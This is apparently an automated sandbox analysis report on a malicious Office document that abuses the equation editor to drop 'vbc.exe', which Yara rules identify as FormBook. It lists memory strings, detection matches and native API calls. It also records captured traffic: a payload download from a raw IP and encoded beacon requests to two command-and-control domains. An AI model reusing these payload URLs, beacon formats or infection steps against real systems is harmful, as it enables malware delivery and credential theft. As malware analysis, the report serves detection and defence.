65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 39 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.532973112.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.530688122.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.666125665.0000000002170000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC400E1B.emfJump to behavior
            Source: unknownDNS traffic detected: queries for: www.paradisgrp.com
            Source: global trafficHTTP traffic detected: GET /service/rundll32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.85Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1Host: www.paradisgrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1Host: www.uvoyus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 16 ' 000g" " . - yellow bar above 17 ""-t This document is 3. Once you ha
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exeJump to dropped file
            Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exeCode function: 4_2_01007C03
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0100502D
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00420098
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004201A0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00425448
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00425508
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042B5A0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004255B8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042AFD0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00427018
            Source: C:\Users\Public\vbc.exeCode function: 4_2_004204E1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00428799
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00425891
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042D9C8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042D9B9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00420A19
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0042AFC1
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA0048
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA0047
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA419A
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA56FD
            Source: C:\Users\Public\vbc.exeCode function: 4_2_01008831
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041E993
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409E30
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041DFD0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0100502D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_01007C03
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4E0C6
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A7D005
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A53040
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A6905A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4E2E9
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AF1238
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4F3CF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A763DB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A52305
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A9A37B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A57353
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A85485
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A61489
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A6C5F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5351F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A54680
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5E6C1
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AF2622
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5C7BC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AD579A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A857C3
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AEF8EE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A7286D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A5C85C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A529B2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00AF098E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_01008831
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027C1238
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271E2E9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0276A37B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02727353
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02722305
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027463DB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271F3CF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0273905A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02723040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0274D005
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271E0C6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027C2622
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272E6C1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02724680
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027557C3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272C7BC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027A579A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02755485
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02731489
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272351F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0273C5F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027D3A83
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02747B00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027ADBDA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271FBD7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027CCBA4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0274286D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272C85C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027BF8EE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027A5955
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027369FE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027229B2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027C098E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0273EE4C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02752E2F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0274DF7C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02730F3F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0272CD5B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02750D3B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027BFDDD
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A4DF5C appears 67 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A9373B appears 144 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00A93F92 appears 60 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00ABF970 appears 48 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0271E2A8 appears 38 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0276373B appears 238 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 02763F92 appears 108 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0271DF5C appears 106 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0278F970 appears 81 times
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419D50 NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E00 NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E80 NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419F30 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419D4A NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419E7C NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419F2A NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A400C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A40078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A410D0 NtOpenProcessToken,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A40060 NtQuerySection,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A401D4 NtSetValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4010C NtOpenDirectoryObject,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A41148 NtOpenThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A407AC NtCreateMutant,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3F8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027100C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027107AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
